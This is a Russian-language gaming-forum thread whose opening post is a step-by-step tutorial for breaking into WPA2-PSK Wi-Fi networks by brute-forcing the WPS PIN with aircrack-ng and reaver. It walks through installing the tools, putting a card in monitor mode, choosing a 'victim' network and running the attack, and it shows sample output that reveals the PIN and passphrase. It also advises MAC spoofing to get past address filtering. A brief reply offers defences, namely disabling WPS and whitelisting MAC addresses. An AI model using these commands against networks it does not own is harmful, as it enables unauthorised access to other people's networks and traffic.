*Drive*- Здесь рулят padonki

*Drive* - Counter Strike Source
It is currently 17 Jan 2019, 08:36

All times are UTC + 3 hours [ DST ]




Post new topic Reply to topic  [ 3 posts ] 
Author Message
PostPosted: 26 Oct 2013, 20:33 
Offline
padonki
User avatar

Joined: 14 Aug 2006, 20:43
Posts: 3657
Location: Солнцево
Has thanked: 9 times
Have thanks: 45 times
Сейчас я покажу как взломать практически любую точку доступа или роутер Wi-Fi с типом шифрования WPA2-PSK менее чем за сутки:

До недавнего времени единственным способом как взломать Wi-Fi сеть с шифрованием WPA2-PSK был перебор всех возможных комбинаций пароля, либо атака по словарю, но для этого еще нужно было заполучить handshake с точки доступа. Процесс перебора занимает от нескольких часов до столетий, все зависит от сложности пароля и вычислительных мощностей взломщика. Например пароль вида Y3tAn0th (верхний, нижний регистр, цифры) на стандартном ПК с современным GPU (70000 вариантов в секунду ) подбирался бы 101 год. Но недавно нашли уязвимость, позволяющую найти ключ доступа менее чем за сутки, на моей системе и роутере D-link Dir-320 процесс занял 10 часов 40 минут. Лазейка обнаружилась в способе взломать WPS (Wi-Fi Protected Setup), это когда подключение к точке доступа осуществляется по 8-значному цифрому PIN-коду, который гораздо легче подобрать, причем данная фича включена по умолчанию на многих роутерах, включая популярные D-link Dir-615 и Dir-320 !

Подготовка взлома WPS

И так, для начала установим нужный софт, нам понадобиться:

aircrack-ng
reaver-wps

Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив BackTrack 5, в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack:
Code:
vim /etc/apt/sources.list

Добавим в конец файла следующее:

Code:
# Repository Backtrack
deb http://all.repository.backtrack-linux.org
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Экспортируем ключ безопастности репозитория:

Code:
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -


И обновим списки пакетов:

Code:
apt-get update


Ставим пакеты:

Code:
apt-get install aircrack-ng reaver


Взлом WPS:

Так как взломать Wi-Fi сеть WPA2-PSK ?

Переведем нашу карту в monitor mode

Code:
airmon-ng start wlan0


Должно быть примерное так:
Quote:
Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0)

Теперь найдем жертву

Code:
airodump-ng mon0


Будет список доступных сетей:
Quote:
CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes


Проверим, включен ли WPS на точке

Code:
wash -i mon0


Начинаем перебор:

Code:
reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv


Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения

В результате пошел перебор пинов:

Quote:
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
[+] Waiting for beacon from 1C:BD:B9:B5:C6:B9
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240)
[+] Trying pin 12345670


В конечном итоге :

Quote:
[+] WPS PIN: '80369424'
[+] WPA PSK: 'TryT0H4CkMe'
[+] AP SSID: 'iformula.ru 193.240'

видим как взлом Wi-Fi сети WPA2 успешно заверен.

Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver:

Code:
reaver -h


Возможные проблемы:

- не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode

- В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер.

- В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng)
Дополнительно:

Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ. :)

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Image


Top
 Profile  
 
PostPosted: 26 Oct 2013, 21:53 
Offline
User avatar

Joined: 15 Jun 2009, 22:39
Posts: 814
Location: Moscow city
Has thanked: 7 times
Have thanks: 6 times
Как с этим бороться?

_________________
Image


Top
 Profile  
 
PostPosted: 26 Oct 2013, 23:18 
Offline
padonki
User avatar

Joined: 14 Aug 2006, 20:43
Posts: 3657
Location: Солнцево
Has thanked: 9 times
Have thanks: 45 times
Отключать WPS , прописывать МАС адреса разрешённые...

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Image


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 3 posts ] 

All times are UTC + 3 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  


Powered by -=PadonaK=- ®, Forum Drivesource.ru, Статситика игрового ресурса *Drive* HLstatsX, Система забаненых игроков Sourcebans

drivesource.ru ® 2006-2019